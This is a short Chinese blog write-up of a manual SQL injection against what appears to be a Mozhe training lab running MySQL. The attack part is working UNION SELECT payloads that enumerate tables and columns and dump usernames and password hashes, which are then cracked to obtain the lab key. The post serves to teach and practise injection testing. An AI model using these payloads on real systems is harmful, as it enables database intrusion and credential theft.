SQL手工测试(MySQL数据库)

lubiii_2025-06-09 10:26

1.看到注入点,测试列字段数量,发现为4正常,为5出错,可知列数为5

2.找到数据库名mozhe_Discuz_StormGroup

3.查询表名?id=-1%20union%20select%201,2,group_concat(table_name),4%20from%20information_schema.tables%20where%20table_schema=%27mozhe_Discuz_StormGroup%27

得到StormGroup_member,notice

4.查询列名

?id=-1%20union%20select%201,2,group_concat(column_name),4%20from%20information_schema.columns%20where%20table_name=%27StormGroup_member%27

5.获取数据

?id=-1%20union%20select%201,2,concat(name,0x5c,password),4%20from%20StormGroup_member

mozhe\356f589a7df439f6f744ff19bb8092c0

此时发现直接输入会账密错误,说明需要解码

6.将密码解码得到的结果也是始终不正确,考虑其他数据

id=-1%20union%20select%201,2,concat(name,0x5c,password),4%20from%20StormGroup_member%20limit%201,1

mozhe\89f76612d6fbbeb12265a7300301f024

7.再次解密验证

8.成功啦,获得Key:mozhe69c92e07d1330df9daeaeea8738

相关推荐
没有bug.的程序员18 分钟前
Redis 内存优化与压缩:从原理到实战的完整指南
java·数据库·redis·内存优化·压缩内存
肃清119 分钟前
《Redis核心机制解析》
数据库·redis·缓存
TG_yunshuguoji25 分钟前
阿里云国际代理:如何利用RDS构建高可用、可扩展的数据库架构
服务器·数据库·阿里云·云计算·数据库架构
大可门耳35 分钟前
Qt的数据库模块介绍,Qt访问SQLite详细示例
数据库·qt·sqlite
无名客02 小时前
SQL语句执行时间太慢,有什么优化措施?以及衍生的相关问题
java·数据库·sql·sql语句优化
咋吃都不胖lyh2 小时前
SQL数据分析原代码--创建表与简单查询
java·数据库·sql
爱思德学术2 小时前
中国计算机学会(CCF)推荐学术会议-B(数据库/数据挖掘/内容检索):DASFAA 2026
数据库·区块链·数据管理·数据库系统
axban2 小时前
QT M/V架构开发实战:QAbstractItemModel介绍
java·数据库·qt
云飞云共享云桌面2 小时前
非标自动化工厂如何10个三维设计共用一台云主机
大数据·运维·服务器·网络·数据库
哈喽姥爷2 小时前
Spring Boot--yml配置信息书写和获取
java·数据库·spring boot·mybatis
热门推荐
01conda中设置镜像地址(附所有可换的地址)02UV安装并设置国内源03GitHub 镜像站点04A股预测还能更准?开源大模型Kronos带你跑通预测+回测全流程05KGG转MP3工具|非KGM文件|解密音频06突破百度网盘的下载限速,两种方法教会你【超详细】07UV 工具安装与国内镜像源配置指南0846个Nano-banana 精选提示词,持续更新中09保姆级教程:手把手教你用Dify实现完美多轮对话(附Chatflow和提示词)10Spec-Kit 使用指南